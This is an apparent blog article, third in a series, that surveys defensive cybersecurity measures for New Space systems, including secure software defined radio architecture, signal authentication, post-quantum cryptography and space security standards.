The post Cybersecurity in the next-generation space age, pt. 3: Securing the new space appeared first on Security Intelligence.

]]>

View Part 1, Introduction to New Space, and Part 2, Cybersecurity Threats in New Space, in this series.

As we see in the previous article of this series discussing the cybersecurity threats in the New Space, space technology is advancing at an unprecedented rate — with new technologies being launched into orbit at an increasingly rapid pace.

The need to ensure the security and safety of these technologies has never been more pressing.

So, let’s discover a range of measures to secure the space systems.

Security by design

Security by design is an approach to designing systems, products, or applications with security as a primary consideration from the outset, rather than adding it as an afterthought.

Security by design is an important consideration in the New Space industry because New Space companies are often startups or smaller companies that are developing innovative solutions to space-related challenges, and security by design is essential to ensure the safety, reliability and security of these new technologies and satellites.

One of the key components used in the New Space industry is the software defined radio (SDR).

Let’s dive deeper into the application of a security by design approach for an SDR architecture.

Secure SDR architecture

Software defined radio is the new groundbreaking technology leading this new space era.

Thus, securing the SDR architecture is an essential step in preventing cyberattacks.

The European Secure Software Defined Radio (ESSOR) is a project created by nine European countries. It seeks to develop mutual technologies for European military radios and provide a secure communication system.

NASA also developed a Space Telecommunications Radio System (STRS) architecture standard.

The purpose is to develop an SDR architecture security by design.

SDR architecture is composed of a software part and a hardware part. There were many proposals to secure the SDR architecture addressing the software part as well as the hardware part.

On the one hand, a proposed secure SDR architecture focusing on hardware is the new spectrum management architecture. This design is based on an automatic and calibration & certification unit (ACU), a radio security module (RSM) and a built-in GPS receiver.

Proposed SDR hardware architecture

The ACU is a hardware radio frequency (RF) manager. It checks output power spectrum compliance with the local radio regulation parameters. The ACU is integrated between the programmable physical layer and the RF modules.

RSM is the security manager of the hardware; the local radio regulation parameters are securely downloaded to the hardware and stored in the RSM. It manages the software life cycle — downloading, installation, operation and termination.

This architecture relies on a security module, based on software or tamper-proof hardware, to secure the software operations (download and installation) or the radio frequency configuration parameters.

On the other hand, a proposal for securing SDR based on software architecture looks as follows.

There are some software SDR architecture components that need to be secured.

The new proposed architecture is based on two key concepts. The first key is the separation between the application environment and the radio operating environment so that the compromise of one does not affect the other.

The second key is the check against security policies of all the SDR reconfiguration parameters created by the application environment before they result in impact on the radio environment.

Traditional (a) and proposed (b) secure architecture of SDR

The defined SDR secured architecture includes a secure radio middleware (SRM) layer. It contains the components that need to be secured: radio applications (RA) and the radio operation environment (ROE).

RA is a software component in SDR that controls the radio by implementing the air interface and modulation and communication protocols. RA needs to be protected because a hacker can reconfigure it with erroneous parameters (frequency, modulation, etc.).

ROE contains the fundamental core components for the radio platform operation.

The SRM layer is built under the user application environment (UAE) layer (OS); thus, it’s immune to UA and UAE compromises.

This secure layer contains verification mechanisms that ensure the radio reconfigurations compliance with the security policies.

Proactive defense

Proactive defense in cybersecurity refers to the measures and strategies designed to prevent a potential cyber threat to assets and systems before they can cause harm.

By taking a proactive approach in space systems, New Space companies can better protect themselves against potential cyberattacks and minimize the impact of any security breaches that do occur.

Proactive defense in space systems may include measures like:

  • Risk assessments
  • Vulnerability management
  • Patch management to apply software patches and updates with the aim to fix flaws and vulnerabilities
  • Threat modeling by identifying potential threats and attack vectors
  • Attack surface management
  • Endpoint protection with behavioral analysis and machine learning capabilities
  • Security awareness training for space system operators to educate potential space security risks and best practices
  • Offensive security assessments including pentest and red team campaigns to apply an adversarial approach and determine the weaknesses in the space system components.

A proactive approach can help to ensure the safe and effective operation of space-based assets and systems and can also help to maintain the integrity of critical space-based infrastructure.

Reactive defense

Reactive defense refers to the approach of responding to cyber threats and attacks after they have already occurred.

The reactive cyber defense measures may include:

  • Forensic analysis to determine the root cause of a security incident after it has occurred
  • Security Information and Event Management (SIEM) solutions to collect, analyze and respond to security events and alerts from various sources within the space system components
  • Incident response with the development of plans and procedures to respond to security incidents, such as a data breach or a cyberattack on a satellite or ground station
  • Disaster recovery plan.

A reactive approach is very important to minimize the damage caused by a cyberattack and restore normal operations as quickly as possible.

However, by combining proactive and reactive defense measures, space industry actors can create a comprehensive security strategy that addresses both the prevention and response to cyberattacks.

Identity and access management

Identity and access management (IAM) for space assets is an essential measure to improve security posture and streamline how users and consumers access resources and services.

In the ground segment, command and control centers require IAM controls.

Ground station components like the payload control station, flight control station and SDR need to be secured by strict access control policies.

Regarding space vehicles, access control needs to be implemented for SDR, data handler and flight computer components to authorize only legitimate users to access sensitive data and satellite commands.

Space industry actors need to adopt an identity and access management strategy as a part of building an enduring security program using a zero trust approach so that they can:

  • Establish a state of least privilege so no user has any more access than what’s needed
  • Verify continuously, as users access data and tools
  • Always assume a breach.

Signal authentication

Signal authentication is one of the essential mechanisms that can protect satellite communication from attacks like jamming, eavesdropping or spoofing.

Most of the satellites use broadcast flow to send data downlink to the ground station — GNSS data is one such example.

According to research developed by Qascom company, the GNSS Authentication protocols can be categorized into three domains: data level, signal Level, and hybrid level.

Data level authentication

In data level authentication schemes, we talk about cryptography.

To ensure the integrity, authentication and non-repudiation of exchanged data, we need a broadcast data authentication scheme.

The simplest broadcast data authentication schemes are based on message authentication codes (MACs), which provide data integrity and data authentication, and digital signatures (DSs), which address integrity, authentication and non-repudiation.

These schemes include three main families: block hashing, hash chaining and MAC-based source authentication schemes.

Timed Efficient Stream Loss-Tolerant Authentication (TESLA) is an example of an authentication protocol using MAC-based source authentication schemes. TESLA protocol is known for its robustness to Denial-of-Service attacks.

Navigation Message Authentication (NMA) is also a concept of data-level authentication introduced in 2005 to provide authenticity and integrity to the navigation message stream.

Signal level authentication

Signal level schemes refer to the spread of spectrum signal properties. Leveraging these signal level schemes, it’s hard for an attacker to demodulate the signal without knowledge of the secret code.

Spread spectrum security codes (SSSCs) and signal authentication sequences (SAS) are schemes that were proposed as signal level authentication.

Hybrid level authentication

Hybrid authentication is a solution that combined both data and signal level authentication. Hence, the concept of supersonic codes is introduced.

The supersonic codes are block ciphered and in code phase with open codes, and the same code is repeated for a predefined security period. This allows direct authentication without time dependency, as opposed to stream-cipher-based solutions.

The protocol focused to deliver a very fast authentication scheme that does not require time knowledge.

The supersonic authentication scheme is robust against known GNSS attacks such as spoofing and replay.

Cryptography

Quantum key distribution

Quantum Key Distribution (QKD) is an emerging technique that relies on the unique properties of quantum mechanics and provides tamper-evident communication used to deploy new cryptographic keys with unconditional post-quantum security and without direct physical contact.

In 2016, China launched a satellite-based quantum cryptography: Micius Satellite.

The satellite had successfully demonstrated the feasibility of satellite-based quantum cryptography and has been used for communication between a fiber-based QKD backbone and remote areas of China.

Post-quantum cryptography

Post-Quantum Cryptography (PQC) is an alternative approach to secure communication and data exchange between satellites and ground stations. Unlike QKD, PQC uses cryptography and mathematical calculation to develop secure cryptosystems for both classical and quantum computers.

In July 2022, The US National Institute of Standards and Technology (NIST) announced the first quantum-safe cryptography protocol standards for cybersecurity in the quantum computing era.

In 2016, contenders from all over the world submitted 69 cryptographic schemes for potential standardization. NIST later narrowed down the list of candidates over three stages, eventually shortlisting seven finalists — four for public key encryption and three for digital signatures. At the end of a six-year-long process, three of the four chosen standards were developed by the IBM team, in collaboration with several industries and academic partners. They include the CRYSTALS-Kyber public-key encryption and the CRYSTALS-Dilithium digital signature algorithms, which were chosen as primary standards. The Falcon digital signature algorithm was chosen as a standard to be used in situations where the use of Dilithium would be space prohibitive.

Security protocols and standards

As discussed earlier in this series, satellite communications are very exposed to adversary cyberattacks. Many errors and vulnerabilities exist and have been exploited.

Security against communication attacks has become a major issue. The need for safe and correct communication protocols is necessary.

The Consultative Committee for Space Data Systems (CCSDS) has developed a recommendation standard for the Space Data Link Security Protocol (SDLS).

The CCSDS protocols were developed specifically for space use tackling the use of packet telemetry.

The SDLS Protocol is a data processing method for space missions that need to apply authentication and/or confidentiality to the contents of transfer frames used by Space Data Link Protocols over a space link. The Security Protocol is provided only at the data link layer (Layer 2) of the OSI Basic Reference Model.

The purpose of the Security Protocol is to provide a secure standard method, with associated data structures, for performing security functions on octet-aligned user data within Space Data Link Protocol transfer frames over a space link.

Regarding CubeSats, a communication implementation in open source is preferable. CubeSat Space Protocol (CSP) is a lightweight, small network-layer delivery protocol designed for CubeSats communications. CSP ensures encryption and integrity.

The National Institute of Standards and Technology published in December 2022 an interagency report (NIST IR 8401): a cybersecurity framework for the satellite ground segment of space operations.

The purpose of this framework is to assist the operators of the commercial ground segment in providing cybersecurity for their systems, managing cyber risks, and addressing the Space Policy Directive 5 (SPD-5) goals for space cybersecurity. SPD-5 is the nation’s first comprehensive cybersecurity policy for space systems.

Conclusion

The development and deployment of space technology in the New Space age bring with it a new set of cybersecurity challenges. With the increasing number of satellites and spacecraft being launched, it is essential that we ensure their secure design, operation and communication to prevent cyberattacks that could compromise sensitive data or disrupt satellite services.

Looking forward, the future development of New Space technology holds great promise, with the potential for even more significant discoveries and advancements in various areas. So, what are the future development areas and challenges for the New Space industry? The next article in this series will bring the answer to that question.

The post Cybersecurity in the next-generation space age, pt. 3: Securing the new space appeared first on Security Intelligence.

]]>